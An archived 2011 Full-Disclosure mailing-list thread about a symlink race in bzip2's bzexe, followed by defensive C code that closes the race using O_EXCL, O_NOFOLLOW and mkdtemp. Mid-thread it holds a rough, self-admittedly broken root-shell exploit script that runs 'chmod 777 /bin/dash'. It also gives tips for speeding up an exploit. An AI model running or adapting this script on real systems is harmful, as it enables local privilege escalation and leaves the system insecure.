Message-ID: <CALCvwp7RVKBCga-YVam4psEKkBKTALgcZRHzkLJXbOG59rOTOQ@mail.gmail.com>
Date: Mon, 7 Nov 2011 09:33:58 +1100
From: xD 0x41 <secn3t@...il.com>
To: vladz <vladz@...zero.fr>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Symlink vulnerabilities

Nice :)
I have put a post about this whole thread on www.crazycoders.com ,
will add this and props for those involved now :)
thx to you, bugs and for others who were involved, also realise that i
have now found that bzexe = bzip2 src code, so looking on
debian/ubuntu and centos, there is a bzexe or bzip2 on every box,...
luckily this issue is patched for both bzip2 and bzexe but know that
it is even still being tested now against bunzip2 , on decompressions,
but has not been done, only know that the src is same as bzip2
executable binary (linux), again, thx to everyone involved, it got
patched within a day which is what was the aim... Ubuntu is a little
safer ;s
cheers.
xd


On 7 November 2011 03:54, vladz <vladz@...zero.fr> wrote:
>
> Hi!
>
> It's raining here, so I finally wrote a PoC for the bzexe issue:
>
>  http://vladz.devzero.fr/other/bzexe_PoC.c.html
>
> It always succeeds on my Dual-core.
>
> Cheers,
> vladz.
>
>
> On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote:
>> I just did a quick write of it , i think this is right anyhow.. i ain't
>> the greatest of bash/exploit coders in bash but i did try, and, i
>> kinda had it almost same, but for one line, the while.. i guess that
>> does it, well. here is an example i guess, if we were to use gcc and
>> make a binary called 'bad' properly.. i assume this would be the
>> way... 8
>>
>>
>> #!/bin/sh
>> cd /tmp
>> cat > /tmp/bad.c << EOF
>> chmod 777 /bin/dash
>> EOF
>> gcc /tmp/bad.c -o /tmp/bad
>> while (true) do ./bz.sh ; done
>> #!/bin/bash
>> if [ -a /tmp/bash/gztmp* ]
>> then
>> echo "[+] Exploting .."
>> mv /tmp/bash /tmp/bash.dir
>> cp /tmp/bad /tmp/dash
>> echo "[!] Got dash rootshell in: /tmp/dash .."
>> ./dash
>> ls -l /tmp/dash
>> while (true) do ./bz.sh ; done
>> whoami
>> id
>> su
>> fi
>>
>> I think this would be kinda close ?
>> I don't expect this to go onto public domain AT ALL, so please, I'll
>> respect your privacy but, you also respect mine ok :)
>> I like you, you're a great guy, and, awesome for taking the challenge,
>> where even the strongest, like taviso, and kcope even, left in your
>> wake... and even i am a bit shocked but, am going to try and, put it
>> into practice,... the .c bzexe doesn't really do it for me :P but yes,
>> i did change it a little so it at least echoes across a tmp bin/sh or,
>> so i think it needs.. then again, it might not need anything, but, i
>> know these pocs won't get people a rootshell unless we show them, so, i
>> guess as long as these kinda emails stay pvt, it's all good.
>> i have a lot of bugs in the bash area, and i discuss a lot with some
>> members of the list even on my irc channel on efnet #haxnet , and,
>> there is ALL the exploit coders from FD probably, phrack and more
>> gropups,core,kcope,and rapid7,all them other smaller secteams seem to
>> lurk also, from a 3 user channel about 1 year ago, simply speaking
>> about PoCs made and their worth.
>> I guess it is good to see and then to prioritise, as debian have done
>> now, with the bzexe :)
>> See, it would have probably remained nothing done for god knows, if you
>> had not taken the challenge up, and, i can't believe you did it with a
>> shitty 500mhz! LOL, i am looking at about 4 of those atm on my floor,
>> i did a tradein offer, p3 for p4 for 50bux, and , i was after that
>> exact celeron and pentium 500mhz p3 cores, they're very good when
>> played with and, my gears all rack.
>> Anyhow, i would love to chat with you, you use irc >?
>> if so, I'd love to catch up and have a chat anytime :)
>> If you're in Australia, well heck come over for a coffee buddy!
>> have a great day, and, if you can fix this to make a rootshell, well,
>> it should make it anyhow but, just in case, i guess this is my own
>> collection, and, i have like 6 sh files, which between them, get all
>> 2011 and earlier, and it is really scary because, there is NO way to
>> exploit them , if using .c ... Anyhow, thank you, very much, and, i and
>> the secworld owe you a big thanks :)
>> I only wish they credited ppl like me, who try to inspire...lol, i
>> guess i am like one of those dodgy football managers who sleeps with
>> pros and stuff... hehe... kept in the back... for the sake of
>> sanity.
>> lol... have a good one mate!
>> xd / crazycoders.com ( i will soon make an article and a complete patch
>> solution etc, when it has a patch available, of course then
>>
>> PS: i will post it in one big PoC details with solution and patch
>> attached to the posting etc...i don't like to publish things which are
>> not at least being patched.... so, i guess, enjoy!
>>
>>
>>
>>
>>
>> On 28 October 2011 04:34, vladz <vladz@...zero.fr> wrote:
>> >
>> >
>> > On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote:
>> >> http://pastebin.com/FaaEsXRW
>> >
>> > Nice thing, but for sure, it can be optimized.
>> >
>> > For example, to save time, I would suggest you use rename() instead
>> > of using both unlink() and rmdir() functions.  Same thing for your
>> > write_shellcode() function, it contains too many calls.  It would be
>> > preferable to create your nasty shell script first, and then (when it's
>> > time), rename() it as dirname.
>> >
>> > Cheers,
>> > --
>> > http://vladz.devzero.fr
>> > PGP key 8F7E2D3C from pgp.mit.edu
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>
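The thread above is about the attacker's side of a symlink race on a predictable name under /tmp. For the defender's side, here is an added example (not code from the thread, from vladz's PoC, or from bzip2/bzexe) showing the two primitives that close this class of bug: open(2) with O_CREAT|O_EXCL|O_NOFOLLOW for a fixed name, and mkdtemp(3) for an unpredictable private directory. It assumes a Linux/POSIX system with a writable /tmp; the "planted symlink" check runs entirely inside a sandbox directory the code creates and removes itself.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open PATH for writing only if it does not yet exist and is not a symlink.
 * O_CREAT|O_EXCL makes the kernel refuse a pre-planted entry (EEXIST) and
 * O_NOFOLLOW refuses to traverse a symlink in the last component (ELOOP).
 * Returns the fd, or -1 with errno set. */
int open_private_new(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Create an unpredictable, mode-0700 scratch directory under BASE with
 * mkdtemp() and a data file inside it. The directory name is random and
 * only our uid can write into it, so nobody can race us on the file name.
 * On success returns the data fd and fills dir_out/file_out; on failure -1. */
int create_private_scratch(const char *base, char *dir_out, size_t dir_len,
                           char *file_out, size_t file_len)
{
    char tmpl[PATH_MAX];
    if (snprintf(tmpl, sizeof tmpl, "%s/scratch.XXXXXX", base) >= (int)sizeof tmpl)
        return -1;
    if (mkdtemp(tmpl) == NULL)
        return -1;
    snprintf(dir_out, dir_len, "%s", tmpl);
    snprintf(file_out, file_len, "%s/data", tmpl);
    int fd = open_private_new(file_out);
    if (fd < 0) {
        rmdir(tmpl);
        return -1;
    }
    return fd;
}

/* Round trip for create_private_scratch(): create, write, read back, clean up.
 * Returns 1 on success, 0 on any failure. */
int scratch_roundtrip(void)
{
    char dir[PATH_MAX], file[PATH_MAX], buf[16] = {0};
    int fd = create_private_scratch("/tmp", dir, sizeof dir, file, sizeof file);
    if (fd < 0)
        return 0;
    int ok = write(fd, "hello", 5) == 5;
    close(fd);
    fd = open(file, O_RDONLY | O_NOFOLLOW);
    ok = ok && fd >= 0 && read(fd, buf, sizeof buf - 1) == 5 && strcmp(buf, "hello") == 0;
    if (fd >= 0)
        close(fd);
    unlink(file);
    rmdir(dir);
    return ok;
}

/* Simulation confined to a sandbox directory this function creates: a
 * symlink is planted at the predictable name "gztmp" (the shape of the
 * bzexe bug), then open_private_new() is asked to write there. Returns 1
 * if the open is refused, 0 if it followed the link, -1 on setup error. */
int symlink_is_refused(void)
{
    char sandbox[] = "/tmp/symlink-demo.XXXXXX";   /* constructed sandbox name */
    char victim[PATH_MAX], lnk[PATH_MAX];
    if (mkdtemp(sandbox) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", sandbox);
    snprintf(lnk, sizeof lnk, "%s/gztmp", sandbox);
    int vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600); /* file we must not clobber */
    if (vfd < 0 || symlink(victim, lnk) != 0) {
        if (vfd >= 0)
            close(vfd);
        unlink(victim);
        rmdir(sandbox);
        return -1;
    }
    close(vfd);
    int fd = open_private_new(lnk);
    int refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0)
        close(fd);
    unlink(lnk);
    unlink(victim);
    rmdir(sandbox);
    return refused;
}

int main(void)
{
    printf("symlink at predictable name refused: %s\n", symlink_is_refused() == 1 ? "yes" : "no");
    printf("private scratch round trip: %s\n", scratch_roundtrip() ? "ok" : "failed");
    return 0;
}
```

The shell equivalent of the second function is mktemp -d, and of the first is set -C (noclobber) plus a name nobody else can guess; a script that does `> /tmp/fixedname` on a world-writable directory has neither protection, which is exactly the window the PoCs in this thread race for.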
